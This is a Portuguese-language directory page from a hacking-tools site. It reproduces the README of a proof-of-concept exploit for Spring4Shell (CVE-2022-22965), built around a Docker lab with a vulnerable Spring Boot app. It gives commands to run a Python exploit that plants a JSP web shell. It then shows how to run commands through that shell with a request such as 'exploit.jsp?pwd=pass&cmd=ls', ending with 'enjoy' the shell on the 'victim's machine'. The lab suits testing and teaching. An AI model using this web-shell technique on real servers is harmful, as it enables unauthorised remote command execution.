Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-22965 — Exploit de prova de conceito para CVE-2022-22965 (Spring4Shell) com uma aplicação Spring Boot vulnerável, script de exploit em Python e ambiente de laboratório baseado em Docker para testes. | Kitploit
Ferramentas/GitHubGitHub/mariomamo/cve-2022-22965
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubmariomamo/cve-2022-22965

CVE-2022-22965

Exploit de prova de conceito para CVE-2022-22965 (Spring4Shell) com uma aplicação Spring Boot vulnerável, script de exploit em Python e ambiente de laboratório baseado em Docker para testes.

Ver Repositório
511há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

👾 CVE-2022-22965

Esta é uma prova de conceito de um exploit para a vulnerabilidade CVE-2022-22965 (spring4shell). Ela é composta por:

  • Uma aplicação Springboot vulnerável;
  • Um script de exploit escrito em Python;
  • Um aplicativo seguro para testar que o exploit não funciona;
  • Um Dockerfile para executar a aplicação vulnerável e testar o exploit;

🔧Colaboradores

  • [🇮🇹] Mario Offertucci;
  • [🇮🇹] Antonio Donnarumma.

⚙️ Pré-requisitos

  • Docker: É usado para executar um contêiner Tomcat com a aplicação Springboot;
  • Python: É usado para executar o exploit;

1️⃣ Executando a aplicação Springboot

Dentro da pasta raiz do projeto existe um Dockerfile que cria uma imagem do Tomcat e copia os arquivos vulnerable_app/target/spring4shell.war e safe_app/target/safeapp.war para a pasta /usr/local/tomcat/webapps, então você só precisa construir a imagem e iniciar o contêiner.

Construir a imagem do Tomcat

root@kitploit:~
docker build -t cve_2022_22965 .

Iniciar o contêiner

root@kitploit:~
docker run -p 8080:8080 -d --name springshell cve_2022_22965

Verificar se a aplicação está respondendo

root@kitploit:~
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson

Se você vir esta resposta

root@kitploit:~
This is Elliot Alderson

Então a aplicação está no ar e funcionando.

2️⃣ Agora você pode executar o exploit

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit

Você pode, opcionalmente, especificar o nome do arquivo jsp injetado, mas isso não é obrigatório. Exemplo

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp

Se você não especificar um nome, um nome aleatório será gerado.

Você verá o seguinte no shell de comando
Após o exploit, você também pode enviar um comando por meio de uma solicitação HTTP GET

root@kitploit:~
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls

Você abriu com sucesso um shell na máquina da vítima! aproveite!

Baixar ferramenta